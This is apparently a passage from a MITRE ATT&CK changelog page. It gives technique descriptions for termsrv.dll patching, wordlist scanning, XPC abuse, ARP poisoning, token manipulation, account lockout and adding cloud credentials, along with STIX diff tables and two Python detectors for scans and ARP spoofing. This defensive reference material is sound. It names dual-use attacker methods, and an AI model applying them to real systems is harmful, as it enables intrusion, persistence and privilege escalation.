Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll file or modifying the ServiceDll value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created. |
| Description |
|---|
| Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)). As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. |
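From the web server's side, the wordlist scans described above leave a distinctive trace: one client producing a burst of 404 responses for many different paths in a short time. The following is an added example (not from the ATT&CK entry or the cited report) of a sliding-window detector over combined-log-format access logs; SAMPLE_LOG is constructed, the client addresses are documentation ranges, and the thresholds are this example's assumptions to be tuned per site.

```python
"""Spot wordlist-driven content discovery in web server access logs.

Added example, not from the page. SAMPLE_LOG is a constructed set of
combined-log-format lines; thresholds are assumptions to tune per site.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str):
    """Return the fields this detector needs, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_content_scans(lines, window=timedelta(seconds=60), min_misses=5, min_distinct=5):
    """Return {client_ip: most distinct 404'd paths seen in any single window} for
    clients that exceed both thresholds inside one sliding window."""
    misses = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e and e["status"] == 404:
            misses[e["ip"]].append((e["ts"], e["path"]))
    findings = {}
    for ip, events in misses.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1          # slide the window forward
            in_window = events[start:end + 1]
            distinct = {p for _, p in in_window}
            if len(in_window) >= min_misses and len(distinct) >= min_distinct:
                findings[ip] = max(findings.get(ip, 0), len(distinct))
    return findings


# Constructed sample: one client sweeps six guessed directories in three seconds,
# another merely misses a favicon twice.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /admin/ HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /backup/ HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "GET /old/ HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:02 +0000] "GET /test/ HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:03 +0000] "GET /dev/ HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:03 +0000] "GET /staging/ HTTP/1.1" 404 162 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:04 +0000] "GET /login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:12:03:10 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:12:03:11 +0000] "GET /favicon.ico HTTP/1.1" 404 162 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:12:03:12 +0000] "GET /favicon.ico HTTP/1.1" 404 162 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, paths in find_content_scans(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {paths} distinct missing paths inside one window")
```

Counting distinct paths, not just 404s, is what separates a scan from a broken link that a browser keeps retrying. Scanners that throttle themselves below the window will slip past this rule, so pairing it with per-client daily totals of distinct 404 paths catches the slow variant.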
| Description |
|---|
Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high-level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications with stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). |
| Description |
|---|
| Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use and store that information in its ARP cache. An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment. The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver) Adversaries may use ARP cache poisoning as a means to intercept network traffic. 
This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003) |
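The two mechanisms in the description, a faster forged reply and a gratuitous reply, both leave a trace a passive sensor on the segment can see: an IP address whose MAC changes, replies where sender and target IP coincide, and one MAC answering for several addresses. The following is an added example (not from the ATT&CK entry or the cited SANS and Cylance material) that evaluates those three indicators over a constructed capture of ARP replies; the record shape, addresses and per-MAC threshold are assumptions of this example.

```python
"""Detect ARP cache poisoning indicators from a stream of ARP replies.

Added example, not from the page. REPLIES is a constructed capture; a real feed
would come from a passive sensor on the segment (arpwatch-style monitoring or a
parsed packet capture). Three indicators are checked: an IP whose sender MAC
changes, gratuitous replies (sender IP == target IP), and one MAC claiming
several IPs, as happens when a host answers for both ends of a conversation.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def analyze_arp_replies(replies, max_ips_per_mac=2, known=None):
    """Return a list of (indicator, subject, detail, ts) tuples.
    `known` may hold a baseline {ip: mac} so the first sighting of an IP is
    compared against the authoritative mapping instead of being trusted."""
    ip_to_mac = {ip: mac.lower() for ip, mac in (known or {}).items()}
    mac_to_ips = defaultdict(set)
    alerts = []
    for r in sorted(replies, key=lambda x: x.ts):
        mac = r.sender_mac.lower()
        if r.sender_ip == r.target_ip:
            alerts.append(("gratuitous_reply", r.sender_ip, mac, r.ts))
        previous = ip_to_mac.get(r.sender_ip)
        if previous is not None and previous != mac:
            alerts.append(("ip_mac_changed", r.sender_ip, f"{previous} -> {mac}", r.ts))
        ip_to_mac[r.sender_ip] = mac
        if r.sender_ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(r.sender_ip)
            if len(mac_to_ips[mac]) == max_ips_per_mac:   # alert once, when the threshold is reached
                alerts.append(("mac_claims_many_ips", mac, sorted(mac_to_ips[mac]), r.ts))
    return alerts


# Constructed capture: gateway .1 and host .10 answer normally, then a third MAC
# claims the gateway's address and sends a gratuitous reply for the host's.
REPLIES = [
    ArpReply(1.0, "aa:bb:cc:00:00:01", "192.168.1.1", "aa:bb:cc:00:00:10", "192.168.1.10"),
    ArpReply(2.0, "aa:bb:cc:00:00:10", "192.168.1.10", "aa:bb:cc:00:00:01", "192.168.1.1"),
    ArpReply(3.0, "aa:bb:cc:00:00:99", "192.168.1.1", "aa:bb:cc:00:00:10", "192.168.1.10"),
    ArpReply(4.0, "aa:bb:cc:00:00:99", "192.168.1.10", "ff:ff:ff:ff:ff:ff", "192.168.1.10"),
]

if __name__ == "__main__":
    for kind, subject, detail, ts in analyze_arp_replies(REPLIES):
        print(f"t={ts:.0f} {kind}: {subject} {detail}")
```

Each indicator has a benign cause that a baseline removes: DHCP reassignment or a replaced NIC changes an IP's MAC, hosts send gratuitous ARP at boot, and first-hop redundancy protocols move a virtual address between routers. Seeding `known` with the segment's gateway and server mappings, and treating the gateway address specially, keeps the alerts to the cases the description is about.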
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-28 01:04:39.141000+00:00 | 2022-07-22 18:37:22.176000+00:00 |
| external_references[1]['source_name'] | RFC826 ARP | Cylance Cleaver |
| external_references[1]['description'] | Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020. | Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. |
| external_references[1]['url'] | https://tools.ietf.org/html/rfc826 | https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf |
| external_references[2]['source_name'] | Sans ARP Spoofing Aug 2003 | RFC826 ARP |
| external_references[2]['description'] | Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020. | Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020. |
| external_references[2]['url'] | https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411 | https://tools.ietf.org/html/rfc826 |
| external_references[3]['source_name'] | Cylance Cleaver | Sans ARP Spoofing Aug 2003 |
| external_references[3]['description'] | Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. | Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020. |
| external_references[3]['url'] | https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf | https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411 |
| x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| Description |
|---|
| Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit the privileges that a user can exercise on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-22 21:36:52.825000+00:00 | 2022-03-21 19:01:25.043000+00:00 |
| x_mitre_data_sources[0] | Process: Process Metadata | Command: Command Execution |
| x_mitre_data_sources[1] | Process: Process Creation | File: File Modification |
| x_mitre_data_sources[3] | Command: Command Execution | Process: Process Metadata |
| x_mitre_data_sources[4] | File: File Metadata | Process: Process Creation |
| x_mitre_data_sources[5] | File: File Modification | Process: OS API Execution |
| x_mitre_data_sources[6] | Process: OS API Execution | File: File Metadata |
| Description |
|---|
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These tokens can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017. | |
| external_references | CAPEC-633 | |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-633 | |
| external_references | Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:51:49.334000+00:00 | 2022-05-03 02:14:43.557000+00:00 |
| external_references[1]['source_name'] | capec | BlackHat Atkinson Winchester Token Manipulation |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/633.html | https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf |
| external_references[2]['source_name'] | Pentestlab Token Manipulation | Microsoft Command-line Logging |
| external_references[2]['description'] | netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017. | Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017. |
| external_references[2]['url'] | https://pentestlab.blog/2017/04/03/token-manipulation/ | https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing |
| external_references[3]['source_name'] | Microsoft Command-line Logging | Microsoft LogonUser |
| external_references[3]['description'] | Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017. | Microsoft TechNet. (n.d.). Retrieved April 25, 2017. |
| external_references[3]['url'] | https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing | https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx |
| external_references[4]['source_name'] | Microsoft LogonUser | Microsoft DuplicateTokenEx |
| external_references[4]['url'] | https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx | https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx |
| external_references[5]['source_name'] | Microsoft DuplicateTokenEx | Microsoft ImpersonateLoggedOnUser |
| external_references[5]['url'] | https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx | https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx |
| external_references[6]['source_name'] | Microsoft ImpersonateLoggedOnUser | Pentestlab Token Manipulation |
| external_references[6]['description'] | Microsoft TechNet. (n.d.). Retrieved April 25, 2017. | netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017. |
| external_references[6]['url'] | https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx | https://pentestlab.blog/2017/04/03/token-manipulation/ |
| external_references[7]['source_name'] | BlackHat Atkinson Winchester Token Manipulation | capec |
| external_references[7]['url'] | https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf | https://capec.mitre.org/data/definitions/633.html |
| x_mitre_defense_bypassed[1] | System access controls | Heuristic Detection |
| x_mitre_defense_bypassed[2] | File system access controls | System Access Controls |
| x_mitre_defense_bypassed[3] | Heuristic Detection | Host Forensic Analysis |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Command: Command Execution | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_defense_bypassed | Host forensic analysis | |
| Old Description | New Description |
|---|---|
| Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.
Adversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-14 19:15:29.911000+00:00 | 2022-04-19 22:57:27.449000+00:00 |
| description | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)<br>In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.<br>Adversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. |
| external_references[2]['description'] | Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. | Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | User Account: User Account Deletion | |
| x_mitre_platforms | Office 365 | |
| x_mitre_platforms | SaaS | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | User Account: User Account Deletion | |
| Old Description | New Description |
|---|---|
| Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. | Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078). |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 18:57:04.505000+00:00 | 2022-10-18 15:50:24.811000+00:00 |
| description | Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. | Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078). |
| external_references[1]['source_name'] | Microsoft User Modified Event | Microsoft Security Event 4670 |
| external_references[1]['description'] | Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017. | Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 | https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670 |
| external_references[2]['source_name'] | Microsoft Security Event 4670 | Microsoft User Modified Event |
| external_references[2]['description'] | Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019. | Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017. |
| external_references[2]['url'] | https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670 | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 |
| x_mitre_data_sources[0] | File: File Modification | User Account: User Account Modification |
| x_mitre_data_sources[1] | Command: Command Execution | Group: Group Modification |
| x_mitre_data_sources[3] | Group: Group Modification | Active Directory: Active Directory Object Modification |
| x_mitre_data_sources[4] | User Account: User Account Modification | Command: Command Execution |
| x_mitre_data_sources[5] | Active Directory: Active Directory Object Modification | File: File Modification |
| x_mitre_detection | Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. | Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.<br>However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078) |
| x_mitre_version | 2.2 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Wojciech Lesicki | |
| x_mitre_platforms | SaaS | |
| Description |
|---|
| Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:20:09.600000+00:00 | 2022-03-08 20:58:13.661000+00:00 |
| Old Description | New Description |
|---|---|
| Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.<br>For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)<br>In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)<br>Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud 